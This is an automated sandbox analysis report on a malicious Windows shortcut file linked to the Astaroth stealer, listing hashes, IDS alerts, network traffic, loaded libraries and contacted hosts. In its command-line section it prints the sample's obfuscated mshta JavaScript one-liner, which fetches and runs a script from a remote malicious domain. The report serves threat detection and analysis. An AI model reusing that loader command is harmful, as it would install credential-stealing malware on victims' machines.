Windows Analysis Report
V323904LY3.lNK.lnk

Overview

General Information

Sample name:	V323904LY3.lNK.lnk
Analysis ID:	1546603
MD5:	2e4c1c46c2c57baf20ef148ec89e47a2
SHA1:	2823f47f3da40c531b538c8edc037c93325dabc5
SHA256:	8c787fa0ec9be5bf076e6c25682a7926aa188a5b9378066008785f165765bc34
Tags:	AstarothGuildmalnkuser-abuse_ch
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: V323904LY3.lNK.lnk

Virustotal: Detection: 22%

Perma Link

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2851288 - Severity 1 - ETPRO MALWARE Astaroth Stealer Activity (GET) : 192.168.2.4:49730 -> 188.114.96.3:443

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62820
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62826

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /?5/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: plenil324.renmark.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.google.com.br

Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?5/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: plenil324.renmark.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.google.com.br

Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr

String found in binary or memory: })();</script><div id="mngb"><div id=gbar><nobr><b class=gb1>Search</b> <a class=gb1 href="https://www.google.com.br/imghp?hl=en&tab=wi">Images</a> <a class=gb1 href="https://maps.google.com/maps?hl=en&tab=wl">Maps</a> <a class=gb1 href="https://play.google.com/?hl=en&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a> <a class=gb1 href="https://news.google.com/?tab=wn">News</a> <a class=gb1 href="https://mail.google.com/mail/?tab=wm">Gmail</a> <a class=gb1 href="https://drive.google.com/?tab=wo">Drive</a> <a class=gb1 style="text-decoration:none" href="https://www.google.com/intl/en/about/products?tab=wh"><u>More</u> »</a></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.com/history/optout?hl=en" class=gb4>Web History</a> | <a href="/preferences?hl=en" class=gb4>Settings</a> | <a target=_top id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com.br/&ec=GAZAAQ" class=gb4>Sign in</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div><center><br clear="all" id="lgpd"><div id="XjhHGf"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%"> </td><td align="center" nowrap=""><input value="en" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="height:32px;margin:4px 0"><input class="lst" style="margin:0;padding:5px 8px 0 6px;vertical-align:top;color:#000" autocomplete="off" value="" title="Google Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid_1" value="I'm Feeling Lucky" name="btnI" type="submit"><script nonce="RXNHAXUkhkvUFFm7j6blOQ">(function(){var id='tsuid_1';document.getElementById(id).onclick = function(){if (this.form.q.value){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;} equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: plenil324.renmark.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com.br

Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1695505386.000001C17827D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hTtpS://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: http://schema.org/WebPage
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com.br/&ec=G
Source: mshta.exe, 00000001.00000002.1696878826.000001C178373000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C17837D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C178380000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://drive.google.com/?tab=wo
Source: mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://news.google.com/?tab=wn
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/.
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/X
Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/lF
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/?5/s
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://plenil324.renmark.org/o
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br
Source: mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/4
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/AGKb
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com.br/IGSb
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com.br/imghp?hl=en&tab=wi
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com.br/setprefdomain?prefdom=US&sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3D
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&hl=pt-BR&source=home
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.dr	String found in binary or memory: https://www.youtube.com/?tab=w1

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62814

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal64.winLNK@1/1@2/2

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htm

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: V323904LY3.lNK.lnk

Virustotal: Detection: 22%

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\mshta.exe

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: mshta.exe, 00000001.00000002.1696618599.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta "javascript:try{try{var _10xlbokj=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];getobject(_10xlbokj[1])[_10xlbokj[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	plenil324.renmark.org	European Union		13335	CLOUDFLARENETUS	true
142.250.138.94	unknown	United States		15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
plenil324.renmark.org	188.114.96.3	true
www.google.com.br	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://plenil324.renmark.org/?5/	true	0%, Virustotal, Browse	unknown
https://www.google.com.br/	false		unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htm	HTML document, Unicode text, UTF-8 text, with very long lines (3822)	03EA95BE9108347432B61E619F13435F	5272A310AAE922F0EDFB8E4564CB695B386F63A1	27EA46A4390F2C74BC5F811971332BD0CAA34F5E4EFF79A67FCD80B19B15D21C

AV Detection

Multi AV Scanner detection for submitted file

Source: V323904LY3.lNK.lnk

Virustotal: Detection: 22%

Perma Link

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2851288 - Severity 1 - ETPRO MALWARE Astaroth Stealer Activity (GET) : 192.168.2.4:49730 -> 188.114.96.3:443

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62820
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62826

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /?5/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: plenil324.renmark.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.google.com.br

Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.138.94
